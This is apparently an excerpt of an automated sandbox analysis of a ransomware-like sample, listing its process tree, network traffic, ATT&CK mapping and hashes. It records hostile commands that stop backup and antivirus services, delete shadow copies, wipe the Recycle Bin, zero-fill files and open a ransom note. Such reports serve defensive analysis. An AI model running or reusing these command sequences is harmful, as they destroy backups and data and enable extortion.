- System Location Discovery: System Language Discovery
PID:1760
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
- System Location Discovery: System Language Discovery
PID:2600 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
- System Location Discovery: System Language Discovery
PID:2596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:2560
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
- System Location Discovery: System Language Discovery
PID:2140
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:1008
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
- System Location Discovery: System Language Discovery
PID:2652 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
- System Location Discovery: System Language Discovery
PID:1692
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:2676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:2396
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:2108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:2468
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
- System Location Discovery: System Language Discovery
PID:3056 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
- System Location Discovery: System Language Discovery
PID:3092
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
- System Location Discovery: System Language Discovery
PID:2944 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:1680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
- System Location Discovery: System Language Discovery
PID:2964
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:2700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
- System Location Discovery: System Language Discovery
PID:1744
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
- System Location Discovery: System Language Discovery
PID:1816 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
- System Location Discovery: System Language Discovery
PID:2536
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
- System Location Discovery: System Language Discovery
PID:1996 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:748
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:820 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:2796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:3156
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:3148
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2484
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2072
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:2296
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2144
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1956
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1880
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2208
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:2256
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2272
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2192
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1628
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:3008
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:628
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:324
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1800
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2492
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:884
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1088
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:1540
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB8D4.bat2⤵
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1920
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3120 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3296
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
- System Location Discovery: System Language Discovery
PID:2472
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵
- Deletes itself
PID:3260 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
- System Location Discovery: System Language Discovery
PID:2152
-
-
Network
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.20.164
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.111.133
-
Remote address:172.217.20.164:443RequestGET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
x-hallmonitor-challenge: CgsIv6H1ugYQgoLOcRIEtdewUw
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-MPPMBAoElj2LhQtJaQKyZg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Date: Sat, 14 Dec 2024 09:32:47 GMT
Server: gws
Content-Length: 398
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-VOgrBE0GEgvwR4QImIH-kA1PGUkkFMs5IqdLRz3BXg47BCOyR1Pg; expires=Thu, 12-Jun-2025 09:32:47 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: __Secure-ENID=24.SE=BKNlNZ7vs4uiP5AOxulecExQJvZtaT7oWAFNKnM8XIWC8i7DDMypEdJGol3DySVfCJ9lIISYnR6iy9aaVOVKPrSNIgB_A4BH3EvJgKN12EhLirq0kCBMA5AcrdWEij6QxI9c1td2y2lylhOQfDP9ILv-mNBDpvAwbJumUJC2XMjxjMWykEgsvJoMTtzsBSPUQE3b3y8c; expires=Wed, 14-Jan-2026 01:51:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exeRemote address:172.217.20.164:443RequestGET /sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Host: www.google.com
ResponseHTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3078
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
172.217.20.164:443https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMtls, http5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe1.1kB 10.0kB 11 14
HTTP Request
GET https://www.google.com/HTTP Response
302HTTP Request
GET https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Response
429 -
185.199.109.133:443raw.githubusercontent.comtls5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe359 B 219 B 5 5
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
172.217.20.164
-
8.8.8.8:53raw.githubusercontent.comdns5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.109.133185.199.110.133185.199.108.133185.199.111.133
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57ca69eac5cd42ef8d58d1078e64e1df9
SHA153b63384f9c2b74fea41b97187c69e2a5cfc985a
SHA256904571e7b01a1508e3f69aec06a49c71c8a6423a109503145869921c5685a60b
SHA5126ab9965548b6c166a2e1052e2d1755f1dc021d91a4494041ce92e5777537a15e741280a328f883eec644d9d500dd1bc2aa16a3fcb06c973d9cb4fc2670540bbb